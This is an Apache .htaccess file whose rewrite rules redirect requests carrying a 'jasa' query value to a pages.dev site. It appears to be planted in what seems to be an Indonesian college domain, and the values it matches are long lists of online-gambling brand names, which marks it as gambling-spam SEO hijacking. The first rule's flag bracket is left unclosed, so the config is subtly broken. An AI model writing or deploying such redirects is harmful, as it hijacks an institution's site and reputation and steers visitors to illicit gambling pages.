RewriteEngine On
# === [1] Redirect AMP URLs from sttaw-dbs168.pages.dev/gacor/?jasa=... 
#      to https://istimewahhhh.pages.dev/?jasa=...
RewriteCond %{HTTP_HOST} ^sttaw-dbs168\.pages\.dev$ [NC]
RewriteCond %{REQUEST_URI} ^/gacor/?$ [NC]
RewriteCond %{QUERY_STRING} (^|&)jasa=(MONAY138|HONDATOTO%20RTP|INDOSAT%20TOTO|SI%20PUTRI%2088|BINTANG%204D|DBL%20TOTO|KOMENG%20TOTO|TOLEJITU%20RTP|MIKA%20TOTO|DALANG%20TOTO|MISTERUNTUNG%2088|NEKOTOTO%20RTP|GENESIS%20TOTO|JIMAT%20TOTO|EPIKWIN138|KOMENG%20TOTO%20RTP|RTP%20WAJIK%2088|BSO88|CAPSAWINS|SINGSLOT|KEDAIMPO|TOTOSAKTI|VODKATOTO%20RTP|MPO879|NETTOTO%20RTP|RTP%20RAJABANDOT%20RTP|RTP%20RAJABANDOT|TOTO222|JOSTOTO%20RTP|REPUBLIK%20365|PANAH%204D|MANIAK%20PLAY|QQWIN4D|PANGERAN%2099|PERIHOKI%20RTP|WAG%20TOTO|BABE%20TOTO|PANDAWA%2088|MULIA%20189|IMPIANTOTO%20RTP|SERBAJITU%20RTP|WDYUK%20RTP|TOPENG%20TOTO|RUSA88|0LB88|MANHWAINDO%20RTP|KETUPAT%20TOTO|IND%20168|BIDIKBET%20RTP|THR%20777|CIVIC%20TOTO|RUDI%20TOTO|11BOLA%20RTP|KUDETABET%2098|CARTEL%20TOTO|BETNATION777|SWEET4D%20RTP|PULAUCOIN|HOKI%20ALEXIS|ALASKATOTO%20RTP|BIGKLIK%20RTP|SEMESTA%2088|RAJADEWA288|SPY%20777|MONSTERBOLA%20ALTERNATIF|MANGA%20TOTO)(&|$) [NC]
RewriteRule ^.*$ https://istimewahhhh.pages.dev/?%{QUERY_STRING} [R=301,L


# === [2] Redirect sttaw.ac.id/?jasa=DAFTAR to /?jasa=GOPLA88
RewriteCond %{HTTP_HOST} ^(www\.)?sttaw\.ac\.id$ [NC]
RewriteCond %{REQUEST_URI} ^/$ [NC]
RewriteCond %{QUERY_STRING} (^|&)jasa=(MONAY138|HONDATOTO%20RTP|INDOSAT%20TOTO|SI%20PUTRI%2088|BINTANG%204D|DBL%20TOTO|KOMENG%20TOTO|TOLEJITU%20RTP|MIKA%20TOTO|DALANG%20TOTO|MISTERUNTUNG%2088|NEKOTOTO%20RTP|GENESIS%20TOTO|JIMAT%20TOTO|EPIKWIN138|KOMENG%20TOTO%20RTP|RTP%20WAJIK%2088|BSO88|CAPSAWINS|SINGSLOT|KEDAIMPO|TOTOSAKTI|VODKATOTO%20RTP|MPO879|NETTOTO%20RTP|RTP%20RAJABANDOT%20RTP|RTP%20RAJABANDOT|TOTO222|JOSTOTO%20RTP|REPUBLIK%20365|PANAH%204D|MANIAK%20PLAY|QQWIN4D|PANGERAN%2099|PERIHOKI%20RTP|WAG%20TOTO|BABE%20TOTO|PANDAWA%2088|MULIA%20189|IMPIANTOTO%20RTP|SERBAJITU%20RTP|WDYUK%20RTP|TOPENG%20TOTO|RUSA88|0LB88|MANHWAINDO%20RTP|KETUPAT%20TOTO|IND%20168|BIDIKBET%20RTP|THR%20777|CIVIC%20TOTO|RUDI%20TOTO|11BOLA%20RTP|KUDETABET%2098|CARTEL%20TOTO|BETNATION777|SWEET4D%20RTP|PULAUCOIN|HOKI%20ALEXIS|ALASKATOTO%20RTP|BIGKLIK%20RTP|SEMESTA%2088|RAJADEWA288|SPY%20777|MONSTERBOLA%20ALTERNATIF|MANGA%20TOTO)(&|$) [NC]
RewriteRule ^$ /?jasa=GOPLA88 [R=301,L]
